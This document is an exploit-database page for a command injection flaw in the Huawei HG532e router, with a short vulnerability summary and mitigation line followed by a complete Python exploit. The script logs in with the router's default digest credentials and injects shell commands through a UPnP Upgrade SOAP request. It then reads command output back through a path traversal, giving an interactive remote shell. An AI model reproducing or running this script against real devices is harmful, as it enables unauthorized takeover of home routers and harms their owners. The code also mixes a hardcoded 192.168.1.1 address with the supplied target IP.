Exploit for Huawei HG532e Router

vendor:

HG532e Router

by:

Rebellion

8.8

CVSS

HIGH

Command Injection

CWE

Product Name: HG532e Router

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: h:huawei:hg532e_router

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

Exploit for Huawei HG532e Router

This exploit is for Huawei HG532e Router. It is a command injection vulnerability which allows an attacker to execute arbitrary commands on the vulnerable router. The exploit uses the Upgrade service of the router to execute the commands. The exploit is written in Python and uses the requests library to send the malicious payload to the router.

Mitigation:

The user should update the router to the latest version and should not use default credentials.

Source

Exploit-DB raw data:

#!/bin/python
'''
    Author : Rebellion
    Github : @rebe11ion
    Twitter : @rebellion
'''

import urllib2,requests,os,sys
from requests.auth import HTTPDigestAuth
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5
def fetch_url(url):
    global DEFAULT_HEADERS, DEFAULT_TIMEOUT
    request = urllib2.Request(url, headers=DEFAULT_HEADERS)
    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
    return data

def exploit(ip, path):
    url = "http://%s:37215/icon/../../../%s" % (ip, path)
    data = fetch_url(url)
    return data

def main():
    pwd = "/"
    cmd_path = "/tmp/ccmd"
    pwd_path = "/tmp/cpwd"
    while True:
       targetip = sys.argv[1]
       cmd_ = raw_input("[{}]$ ".format(pwd))
       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
       assert cmd_path.startswith("/"), "An absolute path is required"
       data = exploit(targetip, cmd_path)
       open(cmd_path,"wb").write(data)
       if "cd" in cmd_:
          pass
       elif "clear" in cmd_:
          os.system("clear")
       elif "cat" in cmd_:
          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
       else:
          if "|" in cmd_:
             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
          else:
             os.system("cat {}".format(cmd_path))
       pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":
    main()